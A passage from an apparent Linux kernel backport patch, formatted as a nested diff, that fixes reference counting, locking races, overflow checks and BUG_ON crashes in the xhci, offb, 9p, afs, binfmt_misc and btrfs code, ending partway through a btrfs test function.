+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 505f45429c125..ec2f6bedf003a 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -2971,7 +2971,7 @@ static int xhci_configure_endpoint(struct xhci_hcd *xhci,
+ 				xhci->num_active_eps);
+ 		return -ENOMEM;
+ 	}
+-	if ((xhci->quirks & XHCI_SW_BW_CHECKING) &&
++	if ((xhci->quirks & XHCI_SW_BW_CHECKING) && !ctx_change &&
+ 	    xhci_reserve_bandwidth(xhci, virt_dev, command->in_ctx)) {
+ 		if ((xhci->quirks & XHCI_EP_LIMIT_QUIRK))
+ 			xhci_free_host_resources(xhci, ctrl_ctx);
+@@ -4313,8 +4313,10 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+ 		mutex_unlock(&xhci->mutex);
+ 		ret = xhci_disable_slot(xhci, udev->slot_id);
+ 		xhci_free_virt_device(xhci, udev->slot_id);
+-		if (!ret)
+-			xhci_alloc_dev(hcd, udev);
++		if (!ret) {
++			if (xhci_alloc_dev(hcd, udev) == 1)
++				xhci_setup_addressable_virt_dev(xhci, udev);
++		}
+ 		kfree(command->completion);
+ 		kfree(command);
+ 		return -EPROTO;
+diff --git a/drivers/video/fbdev/offb.c b/drivers/video/fbdev/offb.c
+index 91001990e351c..6f0a9851b0924 100644
+--- a/drivers/video/fbdev/offb.c
++++ b/drivers/video/fbdev/offb.c
+@@ -355,7 +355,7 @@ static void offb_init_palette_hacks(struct fb_info *info, struct device_node *dp
+ 			par->cmap_type = cmap_gxt2000;
+ 	} else if (of_node_name_prefix(dp, "vga,Display-")) {
+ 		/* Look for AVIVO initialized by SLOF */
+-		struct device_node *pciparent = of_get_parent(dp);
++		struct device_node *pciparent __free(device_node) = of_get_parent(dp);
+ 		const u32 *vid, *did;
+ 		vid = of_get_property(pciparent, "vendor-id", NULL);
+ 		did = of_get_property(pciparent, "device-id", NULL);
+@@ -367,7 +367,6 @@ static void offb_init_palette_hacks(struct fb_info *info, struct device_node *dp
+ 			if (par->cmap_adr)
+ 				par->cmap_type = cmap_avivo;
+ 		}
+-		of_node_put(pciparent);
+ 	} else if (dp && of_device_is_compatible(dp, "qemu,std-vga")) {
+ #ifdef __BIG_ENDIAN
+ 		const __be32 io_of_addr[3] = { 0x01000000, 0x0, 0x0 };
+diff --git a/fs/9p/xattr.c b/fs/9p/xattr.c
+index 3b9aa61de8c2d..2aac0e8c4835e 100644
+--- a/fs/9p/xattr.c
++++ b/fs/9p/xattr.c
+@@ -34,10 +34,12 @@ ssize_t v9fs_fid_xattr_get(struct p9_fid *fid, const char *name,
+ 		return retval;
+ 	}
+ 	if (attr_size > buffer_size) {
+-		if (!buffer_size) /* request to get the attr_size */
+-			retval = attr_size;
+-		else
++		if (buffer_size)
+ 			retval = -ERANGE;
++		else if (attr_size > SSIZE_MAX)
++			retval = -EOVERFLOW;
++		else /* request to get the attr_size */
++			retval = attr_size;
+ 	} else {
+ 		iov_iter_truncate(&to, attr_size);
+ 		retval = p9_client_read(attr_fid, 0, &to, &err);
+diff --git a/fs/afs/file.c b/fs/afs/file.c
+index 2eeab57df133a..9051ed0085544 100644
+--- a/fs/afs/file.c
++++ b/fs/afs/file.c
+@@ -525,13 +525,17 @@ static void afs_add_open_mmap(struct afs_vnode *vnode)
+ 
+ static void afs_drop_open_mmap(struct afs_vnode *vnode)
+ {
+-	if (!atomic_dec_and_test(&vnode->cb_nr_mmap))
++	if (atomic_add_unless(&vnode->cb_nr_mmap, -1, 1))
+ 		return;
+ 
+ 	down_write(&vnode->volume->cell->fs_open_mmaps_lock);
+ 
+-	if (atomic_read(&vnode->cb_nr_mmap) == 0)
++	read_seqlock_excl(&vnode->cb_lock);
++	// the only place where ->cb_nr_mmap may hit 0
++	// see __afs_break_callback() for the other side...
++	if (atomic_dec_and_test(&vnode->cb_nr_mmap))
+ 		list_del_init(&vnode->cb_mmap_link);
++	read_sequnlock_excl(&vnode->cb_lock);
+ 
+ 	up_write(&vnode->volume->cell->fs_open_mmaps_lock);
+ 	flush_work(&vnode->cb_work);
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 2aecd4ffb13b3..c71a409273150 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -320,7 +320,7 @@ static int load_elf_fdpic_binary(struct linux_binprm *bprm)
+ 	else
+ 		executable_stack = EXSTACK_DEFAULT;
+ 
+-	if (stack_size == 0) {
++	if (stack_size == 0 && interp_params.flags & ELF_FDPIC_FLAG_PRESENT) {
+ 		stack_size = interp_params.stack_size;
+ 		if (interp_params.flags & ELF_FDPIC_FLAG_EXEC_STACK)
+ 			executable_stack = EXSTACK_ENABLE_X;
+diff --git a/fs/binfmt_misc.c b/fs/binfmt_misc.c
+index bb202ad369d53..740dac1012ae8 100644
+--- a/fs/binfmt_misc.c
++++ b/fs/binfmt_misc.c
+@@ -60,12 +60,11 @@ typedef struct {
+ 	char *name;
+ 	struct dentry *dentry;
+ 	struct file *interp_file;
++	refcount_t users;		/* sync removal with load_misc_binary() */
+ } Node;
+ 
+ static DEFINE_RWLOCK(entries_lock);
+ static struct file_system_type bm_fs_type;
+-static struct vfsmount *bm_mnt;
+-static int entry_count;
+ 
+ /*
+  * Max length of the register string.  Determined by:
+@@ -82,19 +81,23 @@ static int entry_count;
+  */
+ #define MAX_REGISTER_LENGTH 1920
+ 
+-/*
+- * Check if we support the binfmt
+- * if we do, return the node, else NULL
+- * locking is done in load_misc_binary
++/**
++ * search_binfmt_handler - search for a binary handler for @bprm
++ * @misc: handle to binfmt_misc instance
++ * @bprm: binary for which we are looking for a handler
++ *
++ * Search for a binary type handler for @bprm in the list of registered binary
++ * type handlers.
++ *
++ * Return: binary type list entry on success, NULL on failure
+  */
+-static Node *check_file(struct linux_binprm *bprm)
++static Node *search_binfmt_handler(struct linux_binprm *bprm)
+ {
+ 	char *p = strrchr(bprm->interp, '.');
+-	struct list_head *l;
++	Node *e;
+ 
+ 	/* Walk all the registered handlers. */
+-	list_for_each(l, &entries) {
+-		Node *e = list_entry(l, Node, list);
++	list_for_each_entry(e, &entries, list) {
+ 		char *s;
+ 		int j;
+ 
+@@ -123,9 +126,49 @@ static Node *check_file(struct linux_binprm *bprm)
+ 		if (j == e->size)
+ 			return e;
+ 	}
++
+ 	return NULL;
+ }
+ 
++/**
++ * get_binfmt_handler - try to find a binary type handler
++ * @misc: handle to binfmt_misc instance
++ * @bprm: binary for which we are looking for a handler
++ *
++ * Try to find a binfmt handler for the binary type. If one is found take a
++ * reference to protect against removal via bm_{entry,status}_write().
++ *
++ * Return: binary type list entry on success, NULL on failure
++ */
++static Node *get_binfmt_handler(struct linux_binprm *bprm)
++{
++	Node *e;
++
++	read_lock(&entries_lock);
++	e = search_binfmt_handler(bprm);
++	if (e)
++		refcount_inc(&e->users);
++	read_unlock(&entries_lock);
++	return e;
++}
++
++/**
++ * put_binfmt_handler - put binary handler node
++ * @e: node to put
++ *
++ * Free node syncing with load_misc_binary() and defer final free to
++ * load_misc_binary() in case it is using the binary type handler we were
++ * requested to remove.
++ */
++static void put_binfmt_handler(Node *e)
++{
++	if (refcount_dec_and_test(&e->users)) {
++		if (e->flags & MISC_FMT_OPEN_FILE)
++			filp_close(e->interp_file, NULL);
++		kfree(e);
++	}
++}
++
+ /*
+  * the loader itself
+  */
+@@ -139,12 +182,7 @@ static int load_misc_binary(struct linux_binprm *bprm)
+ 	if (!enabled)
+ 		return retval;
+ 
+-	/* to keep locking time low, we copy the interpreter string */
+-	read_lock(&entries_lock);
+-	fmt = check_file(bprm);
+-	if (fmt)
+-		dget(fmt->dentry);
+-	read_unlock(&entries_lock);
++	fmt = get_binfmt_handler(bprm);
+ 	if (!fmt)
+ 		return retval;
+ 
+@@ -198,7 +236,16 @@ static int load_misc_binary(struct linux_binprm *bprm)
+ 
+ 	retval = 0;
+ ret:
+-	dput(fmt->dentry);
++
++	/*
++	 * If we actually put the node here all concurrent calls to
++	 * load_misc_binary() will have finished. We also know
++	 * that for the refcount to be zero ->evict_inode() must have removed
++	 * the node to be deleted from the list. All that is left for us is to
++	 * close and free.
++	 */
++	put_binfmt_handler(fmt);
++
+ 	return retval;
+ }
+ 
+@@ -553,30 +600,90 @@ static struct inode *bm_get_inode(struct super_block *sb, int mode)
+ 	return inode;
+ }
+ 
++/**
++ * bm_evict_inode - cleanup data associated with @inode
++ * @inode: inode to which the data is attached
++ *
++ * Cleanup the binary type handler data associated with @inode if a binary type
++ * entry is removed or the filesystem is unmounted and the super block is
++ * shutdown.
++ *
++ * If the ->evict call was not caused by a super block shutdown but by a write
++ * to remove the entry or all entries via bm_{entry,status}_write() the entry
++ * will have already been removed from the list. We keep the list_empty() check
++ * to make that explicit.
++*/
+ static void bm_evict_inode(struct inode *inode)
+ {
+ 	Node *e = inode->i_private;
+ 
+-	if (e && e->flags & MISC_FMT_OPEN_FILE)
+-		filp_close(e->interp_file, NULL);
+-
+ 	clear_inode(inode);
+-	kfree(e);
++
++	if (e) {
++		write_lock(&entries_lock);
++		if (!list_empty(&e->list))
++			list_del_init(&e->list);
++		write_unlock(&entries_lock);
++		put_binfmt_handler(e);
++	}
+ }
+ 
+-static void kill_node(Node *e)
++/**
++ * unlink_binfmt_dentry - remove the dentry for the binary type handler
++ * @dentry: dentry associated with the binary type handler
++ *
++ * Do the actual filesystem work to remove a dentry for a registered binary
++ * type handler. Since binfmt_misc only allows simple files to be created
++ * directly under the root dentry of the filesystem we ensure that we are
++ * indeed passed a dentry directly beneath the root dentry, that the inode
++ * associated with the root dentry is locked, and that it is a regular file we
++ * are asked to remove.
++ */
++static void unlink_binfmt_dentry(struct dentry *dentry)
+ {
+-	struct dentry *dentry;
++	struct dentry *parent = dentry->d_parent;
++	struct inode *inode, *parent_inode;
++
++	/* All entries are immediate descendants of the root dentry. */
++	if (WARN_ON_ONCE(dentry->d_sb->s_root != parent))
++		return;
+ 
++	/* We only expect to be called on regular files. */
++	inode = d_inode(dentry);
++	if (WARN_ON_ONCE(!S_ISREG(inode->i_mode)))
++		return;
++
++	/* The parent inode must be locked. */
++	parent_inode = d_inode(parent);
++	if (WARN_ON_ONCE(!inode_is_locked(parent_inode)))
++		return;
++
++	if (simple_positive(dentry)) {
++		dget(dentry);
++		simple_unlink(parent_inode, dentry);
++		d_delete(dentry);
++		dput(dentry);
++	}
++}
++
++/**
++ * remove_binfmt_handler - remove a binary type handler
++ * @misc: handle to binfmt_misc instance
++ * @e: binary type handler to remove
++ *
++ * Remove a binary type handler from the list of binary type handlers and
++ * remove its associated dentry. This is called from
++ * binfmt_{entry,status}_write(). In the future, we might want to think about
++ * adding a proper ->unlink() method to binfmt_misc instead of forcing caller's
++ * to use writes to files in order to delete binary type handlers. But it has
++ * worked for so long that it's not a pressing issue.
++ */
++static void remove_binfmt_handler(Node *e)
++{
+ 	write_lock(&entries_lock);
+ 	list_del_init(&e->list);
+ 	write_unlock(&entries_lock);
+-
+-	dentry = e->dentry;
+-	drop_nlink(d_inode(dentry));
+-	d_drop(dentry);
+-	dput(dentry);
+-	simple_release_fs(&bm_mnt, &entry_count);
++	unlink_binfmt_dentry(e->dentry);
+ }
+ 
+ /* /<entry> */
+@@ -603,8 +710,8 @@ bm_entry_read(struct file *file, char __user *buf, size_t nbytes, loff_t *ppos)
+ static ssize_t bm_entry_write(struct file *file, const char __user *buffer,
+ 				size_t count, loff_t *ppos)
+ {
+-	struct dentry *root;
+-	Node *e = file_inode(file)->i_private;
++	struct inode *inode = file_inode(file);
++	Node *e = inode->i_private;
+ 	int res = parse_command(buffer, count);
+ 
+ 	switch (res) {
+@@ -618,13 +725,22 @@ static ssize_t bm_entry_write(struct file *file, const char __user *buffer,
+ 		break;
+ 	case 3:
+ 		/* Delete this handler. */
+-		root = file_inode(file)->i_sb->s_root;
+-		inode_lock(d_inode(root));
++		inode = d_inode(inode->i_sb->s_root);
++		inode_lock(inode);
+ 
++		/*
++		 * In order to add a new element or remove elements from the list
++		 * via bm_{entry,register,status}_write(), inode_lock() on the
++		 * root inode must be held.
++		 * The lock is exclusive, ensuring that the list can't be
++		 * modified. Only load_misc_binary() can access it, but does so
++		 * read-only. So we only need to take the write lock when we
++		 * actually remove the entry from the list.
++		 */
+ 		if (!list_empty(&e->list))
+-			kill_node(e);
++			remove_binfmt_handler(e);
+ 
+-		inode_unlock(d_inode(root));
++		inode_unlock(inode);
+ 		break;
+ 	default:
+ 		return res;
+@@ -683,13 +799,7 @@ static ssize_t bm_register_write(struct file *file, const char __user *buffer,
+ 	if (!inode)
+ 		goto out2;
+ 
+-	err = simple_pin_fs(&bm_fs_type, &bm_mnt, &entry_count);
+-	if (err) {
+-		iput(inode);
+-		inode = NULL;
+-		goto out2;
+-	}
+-
++	refcount_set(&e->users, 1);
+ 	e->dentry = dget(dentry);
+ 	inode->i_private = e;
+ 	inode->i_fop = &bm_entry_operations;
+@@ -733,7 +843,8 @@ static ssize_t bm_status_write(struct file *file, const char __user *buffer,
+ 		size_t count, loff_t *ppos)
+ {
+ 	int res = parse_command(buffer, count);
+-	struct dentry *root;
++	Node *e, *next;
++	struct inode *inode;
+ 
+ 	switch (res) {
+ 	case 1:
+@@ -746,13 +857,22 @@ static ssize_t bm_status_write(struct file *file, const char __user *buffer,
+ 		break;
+ 	case 3:
+ 		/* Delete all handlers. */
+-		root = file_inode(file)->i_sb->s_root;
+-		inode_lock(d_inode(root));
++		inode = d_inode(file_inode(file)->i_sb->s_root);
++		inode_lock(inode);
+ 
+-		while (!list_empty(&entries))
+-			kill_node(list_first_entry(&entries, Node, list));
++		/*
++		 * In order to add a new element or remove elements from the list
++		 * via bm_{entry,register,status}_write(), inode_lock() on the
++		 * root inode must be held.
++		 * The lock is exclusive, ensuring that the list can't be
++		 * modified. Only load_misc_binary() can access it, but does so
++		 * read-only. So we only need to take the write lock when we
++		 * actually remove the entry from the list.
++		 */
++		list_for_each_entry_safe(e, next, &entries, list)
++			remove_binfmt_handler(e);
+ 
+-		inode_unlock(d_inode(root));
++		inode_unlock(inode);
+ 		break;
+ 	default:
+ 		return res;
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index 1494ce990d298..052112d0daa74 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -420,8 +420,6 @@ static void __btrfs_remove_delayed_item(struct btrfs_delayed_item *delayed_item)
+ 
+ 	delayed_root = delayed_node->root->fs_info->delayed_root;
+ 
+-	BUG_ON(!delayed_root);
+-
+ 	if (delayed_item->type == BTRFS_DELAYED_INSERTION_ITEM)
+ 		root = &delayed_node->ins_root;
+ 	else
+@@ -970,7 +968,7 @@ static void btrfs_release_delayed_inode(struct btrfs_delayed_node *delayed_node)
+ 
+ 	if (delayed_node &&
+ 	    test_bit(BTRFS_DELAYED_NODE_INODE_DIRTY, &delayed_node->flags)) {
+-		BUG_ON(!delayed_node->root);
++		ASSERT(delayed_node->root);
+ 		clear_bit(BTRFS_DELAYED_NODE_INODE_DIRTY, &delayed_node->flags);
+ 		delayed_node->count--;
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index c17232659942d..9ebb7bb37a22e 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3130,6 +3130,7 @@ static int init_mount_fs_info(struct btrfs_fs_info *fs_info, struct super_block
+ 	int ret;
+ 
+ 	fs_info->sb = sb;
++	/* Temporary fixed values for block size until we read the superblock. */
+ 	sb->s_blocksize = BTRFS_BDEV_BLOCKSIZE;
+ 	sb->s_blocksize_bits = blksize_bits(BTRFS_BDEV_BLOCKSIZE);
+ 
+@@ -3628,6 +3629,7 @@ int __cold open_ctree(struct super_block *sb, struct btrfs_fs_devices *fs_device
+ 	sb->s_bdi->ra_pages *= btrfs_super_num_devices(disk_super);
+ 	sb->s_bdi->ra_pages = max(sb->s_bdi->ra_pages, SZ_4M / PAGE_SIZE);
+ 
++	/* Update the values for the current filesystem. */
+ 	sb->s_blocksize = sectorsize;
+ 	sb->s_blocksize_bits = blksize_bits(sectorsize);
+ 	memcpy(&sb->s_uuid, fs_info->fs_devices->fsid, BTRFS_FSID_SIZE);
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 5f923c9b773e0..72227c0b4b5a1 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -1748,7 +1748,7 @@ static int btrfs_do_readpage(struct page *page, struct extent_map **em_cached,
+ 	int ret = 0;
+ 	size_t pg_offset = 0;
+ 	size_t iosize;
+-	size_t blocksize = inode->i_sb->s_blocksize;
++	size_t blocksize = fs_info->sectorsize;
+ 	struct extent_io_tree *tree = &BTRFS_I(inode)->io_tree;
+ 
+ 	ret = set_page_extent_mapped(page);
+@@ -3348,7 +3348,7 @@ int extent_invalidate_folio(struct extent_io_tree *tree,
+ 	struct extent_state *cached_state = NULL;
+ 	u64 start = folio_pos(folio);
+ 	u64 end = start + folio_size(folio) - 1;
+-	size_t blocksize = folio->mapping->host->i_sb->s_blocksize;
++	size_t blocksize = btrfs_sb(folio->mapping->host->i_sb)->sectorsize;
+ 
+ 	/* This function is only called for the btree inode */
+ 	ASSERT(tree->owner == IO_TREE_BTREE_INODE_IO);
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 21d262da386d5..75ad735322c4a 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -1894,9 +1894,9 @@ static inline void bitmap_clear_bits(struct btrfs_free_space_ctl *ctl,
+ 		ctl->free_space -= bytes;
+ }
+ 
+-static void bitmap_set_bits(struct btrfs_free_space_ctl *ctl,
+-			    struct btrfs_free_space *info, u64 offset,
+-			    u64 bytes)
++static void btrfs_bitmap_set_bits(struct btrfs_free_space_ctl *ctl,
++				  struct btrfs_free_space *info, u64 offset,
++				  u64 bytes)
+ {
+ 	unsigned long start, count, end;
+ 	int extent_delta = 1;
+@@ -2232,7 +2232,7 @@ static u64 add_bytes_to_bitmap(struct btrfs_free_space_ctl *ctl,
+ 
+ 	bytes_to_set = min(end - offset, bytes);
+ 
+-	bitmap_set_bits(ctl, info, offset, bytes_to_set);
++	btrfs_bitmap_set_bits(ctl, info, offset, bytes_to_set);
+ 
+ 	return bytes_to_set;
+ 
+@@ -2677,15 +2677,16 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	u64 offset = bytenr - block_group->start;
+ 	u64 to_free, to_unusable;
+ 	int bg_reclaim_threshold = 0;
+-	bool initial = ((size == block_group->length) && (block_group->alloc_offset == 0));
++	bool initial;
+ 	u64 reclaimable_unusable;
+ 
+-	WARN_ON(!initial && offset + size > block_group->zone_capacity);
++	spin_lock(&block_group->lock);
+ 
++	initial = ((size == block_group->length) && (block_group->alloc_offset == 0));
++	WARN_ON(!initial && offset + size > block_group->zone_capacity);
+ 	if (!initial)
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+-	spin_lock(&ctl->tree_lock);
+ 	if (!used)
+ 		to_free = size;
+ 	else if (initial)
+@@ -2698,7 +2699,9 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		to_free = offset + size - block_group->alloc_offset;
+ 	to_unusable = size - to_free;
+ 
++	spin_lock(&ctl->tree_lock);
+ 	ctl->free_space += to_free;
++	spin_unlock(&ctl->tree_lock);
+ 	/*
+ 	 * If the block group is read-only, we should account freed space into
+ 	 * bytes_readonly.
+@@ -2707,11 +2710,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		block_group->zone_unusable += to_unusable;
+ 		WARN_ON(block_group->zone_unusable > block_group->length);
+ 	}
+-	spin_unlock(&ctl->tree_lock);
+ 	if (!used) {
+-		spin_lock(&block_group->lock);
+ 		block_group->alloc_offset -= size;
+-		spin_unlock(&block_group->lock);
+ 	}
+ 
+ 	reclaimable_unusable = block_group->zone_unusable -
+@@ -2726,6 +2726,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		btrfs_mark_bg_to_reclaim(block_group);
+ 	}
+ 
++	spin_unlock(&block_group->lock);
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 10ded9c2be03b..934e360d1aefa 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4614,7 +4614,14 @@ static noinline int may_destroy_subvol(struct btrfs_root *root)
+ 	ret = btrfs_search_slot(NULL, fs_info->tree_root, &key, path, 0, 0);
+ 	if (ret < 0)
+ 		goto out;
+-	BUG_ON(ret == 0);
++	if (ret == 0) {
++		/*
++		 * Key with offset -1 found, there would have to exist a root
++		 * with such id, but this is out of valid range.
++		 */
++		ret = -EUCLEAN;
++		goto out;
++	}
+ 
+ 	ret = 0;
+ 	if (path->slots[0] > 0) {
+@@ -9104,7 +9111,7 @@ static int btrfs_getattr(struct user_namespace *mnt_userns,
+ 	u64 delalloc_bytes;
+ 	u64 inode_bytes;
+ 	struct inode *inode = d_inode(path->dentry);
+-	u32 blocksize = inode->i_sb->s_blocksize;
++	u32 blocksize = btrfs_sb(inode->i_sb)->sectorsize;
+ 	u32 bi_flags = BTRFS_I(inode)->flags;
+ 	u32 bi_ro_flags = BTRFS_I(inode)->ro_flags;
+ 
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 64b37afb7c87f..31f7fe31b607a 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -517,7 +517,7 @@ static noinline int btrfs_ioctl_fitrim(struct btrfs_fs_info *fs_info,
+ 	 * block group is in the logical address space, which can be any
+ 	 * sectorsize aligned bytenr in  the range [0, U64_MAX].
+ 	 */
+-	if (range.len < fs_info->sb->s_blocksize)
++	if (range.len < fs_info->sectorsize)
+ 		return -EINVAL;
+ 
+ 	range.minlen = max(range.minlen, minlen);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index e482889667ec9..f3b066b442807 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2697,8 +2697,6 @@ int btrfs_qgroup_account_extent(struct btrfs_trans_handle *trans, u64 bytenr,
+ 	if (nr_old_roots == 0 && nr_new_roots == 0)
+ 		goto out_free;
+ 
+-	BUG_ON(!fs_info->quota_root);
+-
+ 	trace_btrfs_qgroup_account_extent(fs_info, trans->transid, bytenr,
+ 					num_bytes, nr_old_roots, nr_new_roots);
+ 
+diff --git a/fs/btrfs/reflink.c b/fs/btrfs/reflink.c
+index f50586ff85c84..fc6e428525781 100644
+--- a/fs/btrfs/reflink.c
++++ b/fs/btrfs/reflink.c
+@@ -659,7 +659,7 @@ static int btrfs_extent_same_range(struct inode *src, u64 loff, u64 len,
+ 				   struct inode *dst, u64 dst_loff)
+ {
+ 	struct btrfs_fs_info *fs_info = BTRFS_I(src)->root->fs_info;
+-	const u64 bs = fs_info->sb->s_blocksize;
++	const u64 bs = fs_info->sectorsize;
+ 	int ret;
+ 
+ 	/*
+@@ -726,7 +726,7 @@ static noinline int btrfs_clone_files(struct file *file, struct file *file_src,
+ 	int ret;
+ 	int wb_ret;
+ 	u64 len = olen;
+-	u64 bs = fs_info->sb->s_blocksize;
++	u64 bs = fs_info->sectorsize;
+ 
+ 	/*
+ 	 * VFS's generic_remap_file_range_prep() protects us from cloning the
+@@ -792,7 +792,7 @@ static int btrfs_remap_file_range_prep(struct file *file_in, loff_t pos_in,
+ {
+ 	struct inode *inode_in = file_inode(file_in);
+ 	struct inode *inode_out = file_inode(file_out);
+-	u64 bs = BTRFS_I(inode_out)->root->fs_info->sb->s_blocksize;
++	u64 bs = BTRFS_I(inode_out)->root->fs_info->sectorsize;
+ 	u64 wb_len;
+ 	int ret;
+ 
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index ec3db315f5618..030edc1a9591b 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -720,7 +720,12 @@ static int begin_cmd(struct send_ctx *sctx, int cmd)
+ 	if (WARN_ON(!sctx->send_buf))
+ 		return -EINVAL;
+ 
+-	BUG_ON(sctx->send_size);
++	if (unlikely(sctx->send_size != 0)) {
++		btrfs_err(sctx->send_root->fs_info,
++			  "send: command header buffer not empty cmd %d offset %llu",
++			  cmd, sctx->send_off);
++		return -EINVAL;
++	}
+ 
+ 	sctx->send_size += sizeof(*hdr);
+ 	hdr = (struct btrfs_cmd_header *)sctx->send_buf;
+@@ -5905,26 +5910,52 @@ static int send_write_or_clone(struct send_ctx *sctx,
+ 	int ret = 0;
+ 	u64 offset = key->offset;
+ 	u64 end;
+-	u64 bs = sctx->send_root->fs_info->sb->s_blocksize;
++	u64 bs = sctx->send_root->fs_info->sectorsize;
++	struct btrfs_file_extent_item *ei;
++	u64 disk_byte;
++	u64 data_offset;
++	u64 num_bytes;
++	struct btrfs_inode_info info = { 0 };
+ 
+ 	end = min_t(u64, btrfs_file_extent_end(path), sctx->cur_inode_size);
+ 	if (offset >= end)
+ 		return 0;
+ 
+-	if (clone_root && IS_ALIGNED(end, bs)) {
+-		struct btrfs_file_extent_item *ei;
+-		u64 disk_byte;
+-		u64 data_offset;
++	num_bytes = end - offset;
+ 
+-		ei = btrfs_item_ptr(path->nodes[0], path->slots[0],
+-				    struct btrfs_file_extent_item);
+-		disk_byte = btrfs_file_extent_disk_bytenr(path->nodes[0], ei);
+-		data_offset = btrfs_file_extent_offset(path->nodes[0], ei);
+-		ret = clone_range(sctx, path, clone_root, disk_byte,
+-				  data_offset, offset, end - offset);
+-	} else {
+-		ret = send_extent_data(sctx, path, offset, end - offset);
+-	}
++	if (!clone_root)
++		goto write_data;
++
++	if (IS_ALIGNED(end, bs))
++		goto clone_data;
++
++	/*
++	 * If the extent end is not aligned, we can clone if the extent ends at
++	 * the i_size of the inode and the clone range ends at the i_size of the
++	 * source inode, otherwise the clone operation fails with -EINVAL.
++	 */
++	if (end != sctx->cur_inode_size)
++		goto write_data;
++
++	ret = get_inode_info(clone_root->root, clone_root->ino, &info);
++	if (ret < 0)
++		return ret;
++
++	if (clone_root->offset + num_bytes == info.size)
++		goto clone_data;
++
++write_data:
++	ret = send_extent_data(sctx, path, offset, num_bytes);
++	sctx->cur_inode_next_write_offset = end;
++	return ret;
++
++clone_data:
++	ei = btrfs_item_ptr(path->nodes[0], path->slots[0],
++			    struct btrfs_file_extent_item);
++	disk_byte = btrfs_file_extent_disk_bytenr(path->nodes[0], ei);
++	data_offset = btrfs_file_extent_offset(path->nodes[0], ei);
++	ret = clone_range(sctx, path, clone_root, disk_byte, data_offset, offset,
++			  num_bytes);
+ 	sctx->cur_inode_next_write_offset = end;
+ 	return ret;
+ }
+@@ -7180,8 +7211,8 @@ static int tree_move_down(struct btrfs_path *path, int *level, u64 reada_min_gen
+ 	u64 reada_done = 0;
+ 
+ 	lockdep_assert_held_read(&parent->fs_info->commit_root_sem);
++	ASSERT(*level != 0);
+ 
+-	BUG_ON(*level == 0);
+ 	eb = btrfs_read_node_slot(parent, slot);
+ 	if (IS_ERR(eb))
+ 		return PTR_ERR(eb);
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 6fc5fa18d1ee6..d063379a031dc 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -2426,7 +2426,7 @@ static int btrfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 		buf->f_bavail = 0;
+ 
+ 	buf->f_type = BTRFS_SUPER_MAGIC;
+-	buf->f_bsize = dentry->d_sb->s_blocksize;
++	buf->f_bsize = fs_info->sectorsize;
+ 	buf->f_namelen = BTRFS_NAME_LEN;
+ 
+ 	/* We treat it as constant endianness (it doesn't matter _which_)
+diff --git a/fs/btrfs/tests/extent-io-tests.c b/fs/btrfs/tests/extent-io-tests.c
+index 350da449db084..d6a5e6afd5dc0 100644
+--- a/fs/btrfs/tests/extent-io-tests.c
++++ b/fs/btrfs/tests/extent-io-tests.c
+@@ -11,6 +11,7 @@
+ #include "btrfs-tests.h"
+ #include "../ctree.h"
+ #include "../extent_io.h"
++#include "../disk-io.h"
+ #include "../btrfs_inode.h"
+ 
+ #define PROCESS_UNLOCK		(1 << 0)
+@@ -105,9 +106,11 @@ static void dump_extent_io_tree(const struct extent_io_tree *tree)
+ 	}
+ }
+ 
+-static int test_find_delalloc(u32 sectorsize)
++static int test_find_delalloc(u32 sectorsize, u32 nodesize)
+ {
+-	struct inode *inode;
++	struct btrfs_fs_info *fs_info;
++	struct btrfs_root *root = NULL;
++	struct inode *inode = NULL;
+ 	struct extent_io_tree *tmp;
+ 	struct page *page;
+ 	struct page *locked_page = NULL;
+@@ -121,12 +124,27 @@ static int test_find_delalloc(u32 sectorsize)
+ 
+ 	test_msg("running find delalloc tests");
+ 
++	fs_info = btrfs_alloc_dummy_fs_info(nodesize, sectorsize);
++	if (!fs_info) {
++		test_std_err(TEST_ALLOC_FS_INFO);
++		return -ENOMEM;
++	}
++
++	root = btrfs_alloc_dummy_root(fs_info);
++	if (IS_ERR(root)) {
++		test_std_err(TEST_ALLOC_ROOT);
++		ret = PTR_ERR(root);
++		goto out;
++	}
++
+ 	inode = btrfs_new_test_inode();
+ 	if (!inode) {
+ 		test_std_err(TEST_ALLOC_INODE);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto out;
+ 	}
+ 	tmp = &BTRFS_I(inode)->io_tree;
